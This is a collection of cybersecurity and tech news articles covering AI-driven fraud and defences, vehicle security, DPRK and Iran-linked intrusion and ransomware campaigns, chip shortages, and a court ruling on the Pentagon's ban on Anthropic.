A new approach to governance frameworks is necessary for enterprises operating in distributed and digitally dependent environments, with a greater emphasis on verification protocols, communication authentication, and continuous monitoring. Parallel to this, it is becoming increasingly difficult for malicious software developers to enter the market. 

In spite of sophisticated threat actors continuing to engineer advanced malware using traditional methods, generative AI provides less experienced adversaries with the ability to interact with the threat landscape. AI-assisted tooling identifies exploitable weaknesses in open-source codebases, generates functional scripts tailored to those vulnerabilities, and iteratively modifies existing payloads to evade signature-based detection. 

While such outputs may not always match the complexity of state-sponsored tooling, they are more effective due to their scalability and speed. Attackers can rapidly test multiple variants against defensive systems and refine their approaches quickly and effectively without the need for extensive technical knowledge. 

The increased iteration cycle contributes to a more volatile threat environment, as it results in a greater variety of attack techniques that are capable of adapting quickly to defensive countermeasures due to the increased diversity of attack techniques. This shift reveals the limitations of traditional security architectures relying primarily on perimeter-based control mechanisms and static prevention systems. 

While firewalls, antivirus solutions, and access controls remain fundamental, they are no longer sufficient to combat automated adversaries that are more adaptive and adaptive. Despite the fact that AI-driven attacks are capable of bypassing rule-based systems, the sheer volume and speed of attempts increase the probability of compromise statistically. 

Organizations are therefore being forced to make detection and response capabilities a core component of their security posture, thus prioritizing them as core components. These include continuous monitoring of endpoints and networks, the use of behavioral analytics to identify deviations from established patterns, and the establishment of workflows for rapid investigation and response to incidents. These measures are essential not only for early threat identification, but also to limit the operational and financial impact of breaches. This development also has a significant economic impact. 

A major factor contributing to scam-related losses is artificial intelligence, which acts as a force multiplier, accelerating the scale and success rate of fraud. Global scam losses are estimated to exceed hundreds of billions annually. AI-enabled scams have increasingly reached execution and completion within a compressed timeframe, often within hours of initial contact, which has reduced the window for detection and intervention. 

Looking forward, the implications go well beyond incremental risk. Incorporating artificial intelligence into cybercriminal operations represents a substantial change in how fraud is conceived, executed, and scaled. With the rapid advancement of attack methodologies, increasing cost-efficiency, and increased autonomy, defensive strategies are unable to keep pace.

In an environment where tactics are evolving in real time, organizations must not only identify isolated threats, but also continually adapt in order to remain competitive. It is becoming increasingly clear that financial institutions are repositioning generative AI as a foundational layer within modern fraud detection architectures as a defensive response to the rapidly changing threat landscape. 

The most significant application of this technology lies in real-time behavioural intelligence, where models are continuously analyzing signals, including typing cadence, navigation patterns, device characteristics, and transactional timing, to establish dynamic baselines for legitimate user activity in real-time. These behavioural signatures can be instantly identified if they depart from them, thus allowing institutions to take action immediately during critical moments, such as digital onboarding or high risk transactions. 

By using such systems in practice, fraud operations have been improved by reducing false positives and improving detection precision, addressing one of the long-standing inefficiencies. When viewed in light of synthetic identity fraud, which has emerged as a persistent and financially material risk across digital channels, this capability becomes particularly relevant. 

Synthetic fraud differs from traditional identity theft by using fabricated and legitimate data to create identities that can be evaded using conventional verification methods. By modeling the lifecycle and behavioral consistency of authentic identities over time,generative AI introduces a more nuanced approach to identifying anomalies that are statistically subtle yet operationally meaningful as they occur. 

Using a near-authentic detection threshold represents a significant departure from rule-based systems, which are often incapable of identifying fraud based on predefined patterns. As a result, transaction monitoring traditionally burdened by excessive alert volumes and limited contextual clarity is undergoing a structural transformation. As a result of these capabilities, cognitive systems are now able to correlate disparate signals into coherent analytical narratives, effectively grouping isolated alerts into fraud scenarios, and prioritizing them based on their inferred impact and risk. 

By shifting from static thresholding to context-aware analysis, detection rates are enhanced as well as the amount of manual work on investigation teams is significantly reduced. Providing institutions with the ability to interpret and explain risk in a structured manner has proven to be critical in environments where speed and accuracy are equally important.

In addition to detection, generative AI is also used to create proactive resilience through large-scale fraud simulations. A stress-testing process involving the generation of synthetic datasets and modelling complex attack scenarios, such as deepfake-enabled payment fraud and coordinated mule account networks, is possible under conditions that closely approximate real-world threats by organizations. 

With the help of simulation environments, security teams are able to identify and refine systemic weaknesses before adversaries exploit them in production systems, thereby shifting from a reactive to an anticipatory defensive posture. Despite this accelerated adoption, the overall fraud landscape continues to deteriorate, underscoring the magnitude of the issue. 

A significant majority of financial institutions have begun utilizing AI-driven tools actively, with adoption rates rapidly increasing in recent years. Nevertheless, fraud losses, particularly those caused by identity abuse, instant payments, and account takeovers, continue to rise, emphasizing the limitations of legacy controls when faced with adaptive adversaries enabled by artificial intelligence. 

As AI enhances defensive capabilities, it simultaneously enhances sophistication and accessibility of attack methodologies, demonstrating a critical inflection point. Generated artificial intelligence is not positioned here as a standalone solution, but rather as a vital component of a future security strategy. Its value lies in enabling systems to continuously learn, to detect anomalies based on greater contextual awareness, and to respond at machine speed when necessary. 

With the interconnectedness of financial ecosystems and the increase in transaction volumes, real-time prediction and neutralization of emerging fraud patterns is becoming increasingly important. To ensure operational integrity and customer trust, organizations need to integrate generative artificial intelligence as a core component of fraud defence as a strategic necessity. 

An increasingly intelligent threat environment makes it a strategic necessity. Managing this rapidly evolving risk environment requires shifting attention from incremental enhancements to deliberate, architecture-level transformation. In order to mitigate fraud, institutions are expected to integrate adaptive intelligence throughout the fraud lifecycle, incorporating advanced analytics into strong governance frameworks, cross-channel visibility, and rapid decision-making processes. 

Human expertise must be paired with machine-driven insights to ensure that automation augments rather than replaces strategic oversight. In order to sustain resilience to increasingly autonomous threats, continuous model validation, adversarial testing, and workforce upskilling will be necessary. Agile, accountable, and real-time responsive organizations will ultimately be in a better position to contain emerging risks in an increasingly AI-mediated financial ecosystem.

Cybersecurity Risks Rise as Modern Vehicles Become Complex Digital Ecosystems

 

Today’s vehicles have evolved into highly interconnected cyber-physical systems, combining mobile apps, backend infrastructure, over-the-air (OTA) update mechanisms, and AI-powered decision-making. This growing integration has significantly expanded the potential attack surface, introducing security risks that traditional IT frameworks were not designed to address. As a result, vulnerabilities are increasingly surfacing across the entire automotive ecosystem.

"Unlike a traditional IT system, like a mail server or your home network, the worst case scenario involves things like safety implications or real-world operational disruptions like closing down a road or being able to cause damage to the environment," said Kamel Ghali, vice president at Car Hacking Village.

With the shift toward software-defined vehicles and reliance on OTA updates, cars are beginning to inherit many of the same security weaknesses seen in conventional IT systems. At the same time, the integration of artificial intelligence introduces new concerns, as these models—now responsible for safety-critical decisions—must be safeguarded against manipulation or external interference, Ghali noted.

During a video interview with Information Security Media Group at the RSAC Conference 2026, Ghali further highlighted several key developments. He explained that the automotive supply chain is increasingly investing in cryptographically secure processors to gain a competitive edge. 

He also pointed out that threat modeling in the automotive sector is expanding beyond traditional IT considerations to address safety, operational continuity, and environmental impact. Additionally, he emphasized that maintaining supply chain integrity will likely emerge as the most significant long-term cybersecurity challenge for the automotive industry.

Ghali brings over seven years of expertise in automotive cybersecurity, specializing in ethical hacking, penetration testing, training, and product security. He is an active contributor to the global cybersecurity community, leads outreach initiatives for the DEF CON Car Hacking Village, and plays a key role in raising awareness about vehicle security risks.

Threat Actors Exploit GitHub as C2 in Multi-Stage Attacks Attacking Organizations in South Korea


GitHub attacked by state-sponsored hackers 

Cyber criminals possibly linked with the Democratic People's Republic of Korea (DPRK) have been found using GitHub as a C2 infrastructure in multi-stage campaigns attacking organizations in South Korea. 

The operation chain involves hidden Windows shortcut (LNK) files that work as a beginning point to deploy a fake PDF document and a PowerShell script that triggers another attack. Experts believe that these LNK files are circulated through phishing emails.

Payload execution 

Once the payloads are downloaded, the victim is shown as the PDF document, while the harmful PowerShell script operates covertly in the background. 

The PowerShell script does checks to avoid analysis by looking for running processes associated with machines, forensic tools, and debuggers. 

Successful exploit scenario 

If successful, it retrieves a Visual Basic Script (VBScript) and builds persistence through a scheduled task that activates the PowerShell payload every 30 minutes in a covert window to escape security. 

This allows the PowerShell script to deploy automatically after every system reboot. “Unlike previous attack chains that progressed from LNK-dropped BAT scripts to shellcode, this case confirms the use of newly developed dropper and downloader malware to deliver shellcode and the ROKRAT payload,” S2W reported. 

The PowerShell script then classifies the attacked host, saves the response to a log file, and extracts it to a GitHub repository made under the account “motoralis” via a hard-coded access token. Few of the GitHub accounts made as part of the campaign consist of “Pigresy80,” "pandora0009”, “brandonleeodd93-blip” and “God0808RAMA.”

After this, the script parses a particular file in the same GitHub repository to get more instructions or modules, therefore letting the threat actor to exploit the trust built with a platform such as GitHub to gain trust and build persistence over the compromised host. 

Campaign history 

According to Fortnet, LNK files were used in previous campaign iterations to propagate malware families such as Xeno RAT. Notably, last year, ENKI and Trellix demonstrated the usage of GitHub C2 to distribute Xeno RAT and its version MoonPeak. 

Kimsuky, a North Korean state-sponsored organization, was blamed for these assaults. Instead of depending on complex custom malware, the threat actor uses native Windows tools for deployment, evasion, and persistence. By minimizing the use of dropped PE files and leveraging LolBins, the attacker can target a broad audience with a low detection rate,” said researcher Cara Lin. 


Microsoft 365 Accounts Targeted in Large Iran-Linked Cyber Campaign


A cyber operation believed to be linked to Iranian threat actors has been identified targeting Microsoft 365 environments, with a primary focus on organizations in Israel and the United Arab Emirates. The activity comes amid ongoing tensions in the Middle East and is still considered active.

According to research from Check Point, the campaign was carried out in three separate waves on March 3, March 13, and March 23, 2026. More than 300 organizations in Israel and over 25 in the U.A.E. were affected. Investigators also observed limited targeting in Europe, the United States, the United Kingdom, and Saudi Arabia.

The attackers focused on cloud-based systems used across a wide range of sectors, including government bodies, municipalities, transportation services, energy infrastructure, technology firms, and private companies. This broad targeting indicates an effort to access both public-sector systems and critical commercial operations.

The primary method used in the campaign is known as password spraying. In this technique, attackers attempt a small number of commonly used passwords across many accounts instead of repeatedly targeting a single account. This approach increases the chances of finding weak credentials while avoiding detection systems such as account lockouts or rate-limiting controls.

Security researchers noted that similar techniques have previously been associated with Iranian groups such as Peach Sandstorm and Gray Sandstorm. The current activity appears to follow a structured sequence. It begins with large-scale scanning and password attempts routed through Tor exit nodes to conceal the origin of the traffic. This is followed by login attempts, and in successful cases, the extraction of sensitive data, including email content from compromised accounts.

Analysis of Microsoft 365 logs revealed patterns consistent with earlier operations attributed to Gray Sandstorm. Investigators observed the use of red-team style tools and infrastructure, as well as commercial VPN services linked to hosting providers previously associated with Iran-linked cyber activity in the region.

To reduce risk, organizations are advised to monitor sign-in activity for unusual patterns, restrict authentication based on geographic conditions, enforce multi-factor authentication for all users, and enable detailed audit logs to support investigation in the event of a breach.


Renewed Activity from Pay2Key Ransomware Operation

In a related development, a U.S.-based healthcare organization was targeted in late February 2026 by Pay2Key, an Iran-linked ransomware group with connections to a broader threat cluster known by multiple aliases. The group operates under a ransomware-as-a-service model and was first identified in 2020.

The version used in this attack represents an upgrade from campaigns observed in July 2025, incorporating improved techniques for evasion, execution, and anti-forensic activity. Reports from Beazley Security and Halcyon indicate that no data was exfiltrated in this instance, marking a shift away from the group’s earlier double-extortion strategy.

The intrusion is believed to have begun through an unknown access point. Attackers then used legitimate remote access software such as TeamViewer to establish a foothold. From there, they harvested credentials to move laterally across the network, disabled Microsoft Defender Antivirus by falsely indicating that another antivirus solution was active, and interfered with system recovery processes. The attackers then deployed ransomware, issued a ransom note, and cleared logs to conceal their activity.

Notably, logs were deleted at the end of the attack rather than at the beginning, ensuring that even the ransomware’s own actions were removed, making forensic analysis more difficult.

The group has also adjusted its affiliate model, offering up to 80 percent of ransom payments, compared to 70 percent previously, particularly for attacks aligned with geopolitical objectives. In addition, a Linux variant of the ransomware has been identified in the wild. This version is configuration-driven, requires root-level access to execute, and is designed to navigate file systems, classify storage mounts, and encrypt data using the ChaCha20 encryption algorithm in either full or partial modes.

Before encryption begins, the malware weakens system defenses by stopping services, terminating processes, disabling security frameworks such as SELinux and AppArmor, and setting up a scheduled task to execute after system reboot. These steps allow the ransomware to run more efficiently and persist even after restarts.

Further developments point to coordination among pro-Iranian cyber actors. In March 2026, operators associated with another ransomware strain encouraged affiliates to adopt an alternative tool known as Baqiyat 313 Locker, also referred to as BQTLock, due to a surge in participation requests. This ransomware, which operates with pro-Palestinian motives, has been used in attacks targeting the U.A.E., the United States, and Israel since July 2025.

Cybersecurity experts note that Iran has a long history of using cyber operations as a response to political tensions. Increasingly, ransomware is being integrated into these efforts, blurring the line between financially motivated cybercrime and state-aligned cyber activity. Organizations need to adopt continuous monitoring, strong authentication measures, and proactive defense strategies to counter emerging threats.

AI Datacenter Boom Triggers Global CPU and Memory Shortages, Driving Price Hikes

 

Spurred by growing reliance on artificial intelligence, computing hardware networks are pushing chip production to its limits - shortages once limited to memory chips now affect core processors too. Because demand for AI-optimized facilities keeps climbing, industry leaders say delivery delays and cost increases may linger well into the coming decade. 

Now coming into view, top chip producers like Intel and AMD face difficulty keeping up with processor needs. Because of tighter supplies, computer and server builders get fewer chips than ordered - slowing assembly processes down. This gap pushes shipment timelines further out while lifting prices by roughly one-tenth to slightly more than an eighth. With supply trailing behind, companies brace for longer waits and steeper costs. Heavy demand has pushed key tech suppliers like Dell and HP to report deeper shortages lately. Server parts now take months rather than weeks to arrive - delays once rare are becoming routine. 

Into early 2026, experts expect disruptions to grow worse, stretching stress across business systems and home buyers alike. With CPU availability shrinking, pressure grows on a memory market already strained. Because of rising AI-driven datacenter projects, need for DRAM and NAND has jumped sharply - shifting production lines from devices like smartphones and laptops. This shift means newer tech such as DDR5 costs more than before, making upgrades less appealing. People now hold onto older machines longer, especially those running DDR4, simply because replacing them feels too costly. 

Nowhere is the strain more visible than in everyday device markets. Higher expenses for parts translate directly into steeper price tags on laptops, along with slower release cycles. Take Valve - their Linux-powered compact desktop hit pause, held back by material shortages. On another front, Micron stepped away from selling memory modules to regular users, focusing instead on large-scale computing and artificial intelligence needs. Shifts like these reveal where attention now lies within the sector. 

Facing growing challenges, legacy chip producers watch as new players step in. Not far behind, Arm launches its debut self-designed CPU, built specifically for artificial intelligence tasks. Demand was lacking - now it's shifting. Big names like Meta, Cloudflare, OpenAI, and Lenovo are paying attention, drawn by fresh potential. Change arrives quietly, then spreads. 

Facing ongoing shortages, market projections point to extended disruptions through the 2030s - altering how prices evolve while shifting the rhythm of technological advances in chips and computing systems.

Judge Blocks Pentagon's Retaliatory AI Ban on Anthropic

 

A federal judge has temporarily halted the Pentagon's effort to designate AI company Anthropic as a supply chain risk, ruling that the move appeared driven by retaliation rather than legitimate security concerns. In a 48-page order, U.S. District Judge Rita Lin, appointed by former President Joe Biden, granted Anthropic a preliminary injunction against 17 federal agencies, including the Pentagon, preventing them from enforcing the ban until the lawsuit concludes. This keeps Anthropic's Claude AI accessible to government users amid escalating tensions over military contracts. 

The conflict erupted during negotiations to expand a $200 million Pentagon contract with Anthropic. Anthropic refused proposed language permitting "all lawful use" of its AI, citing risks like mass surveillance or autonomous weapons—a stance CEO Dario Amodei publicly emphasized. In response, President Donald Trump posted on Truth Social on February 27 directing agencies to "IMMEDIATELY CEASE all use of Anthropic’s technology," while Defense Secretary Pete Hegseth announced on X that no military partners could engage with the firm. 

On March 4, the administration formalized the designation under two statutes: 41 USC 4713 for federal-wide restrictions and 10 USC 3252 for Defense Department-specific actions. Anthropic swiftly filed lawsuits in California's Northern District and the DC Circuit, arguing the labels were pretextual punishment for its ethical safeguards. Judge Lin agreed, noting the government's shift from contract disputes to broad bans suggested improper motives. 

Pentagon Chief Technology Officer Emil Michael countered on X that Lin's order contained "dozens of factual errors" and insisted the 41 USC 4713 designation remains in effect, as it falls outside her jurisdiction . Anthropic welcomed the swift ruling, reaffirming its commitment to safe AI while awaiting DC Circuit decisions. Legal experts are split: some see the injunction as limited, potentially leaving parts of the ban intact. 

This case underscores deepening rifts between AI firms and the government over technology controls in national security.It raises questions about executive power to penalize contractors, the role of public statements in legal proceedings, and AI deployment ethics amid rapid advancements. As appeals loom in the 9th Circuit, the dispute could drag on for years, impacting federal AI adoption and Anthropic's partnerships.